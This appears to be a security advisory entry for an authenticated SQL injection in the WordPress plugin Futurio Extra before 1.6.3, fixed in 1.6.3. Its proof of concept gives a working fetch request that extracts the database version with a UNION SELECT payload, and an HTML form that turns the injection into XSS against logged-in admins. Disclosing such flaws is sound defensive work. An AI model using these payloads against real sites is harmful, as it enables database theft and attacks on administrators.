WordPress Plugin Vulnerabilities
Futurio Extra < 1.6.3 - Authenticated SQL Injection
Description
The plugin is affected by a SQL Injection vulnerability that could be used by high privilege users to extract data from the database as well as used to perform Cross-Site Scripting (XSS) against logged in admins by making send open a malicious link
Proof of Concept
Using SQLi to extract database variables:
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": '" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g', "query_args": "YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==", "query_type": "post"}),
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):
<form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="dilaz_mb_query_select">
<input type="text" name="q" value='" union select 0,1,2,3,4,0x3c696d6720737263206f6e6572726f723d616c6572742831293e,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g'>
<input type="text" name="query_args" value="YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==">
<input type="text" name="query_type" value="post">
<input type="submit">
</form>
Affects Plugins
Fixed in version 1.6.3
References
Classification
Miscellaneous
Original Researcher
Jan w Oleju
Submitter
Jan w Oleju
Verified
Yes
Timeline
Publicly Published
2022-01-04 (about 1 years ago)
Added
2022-01-14 (about 1 years ago)
Last Updated
2022-04-13 (about 9 months ago)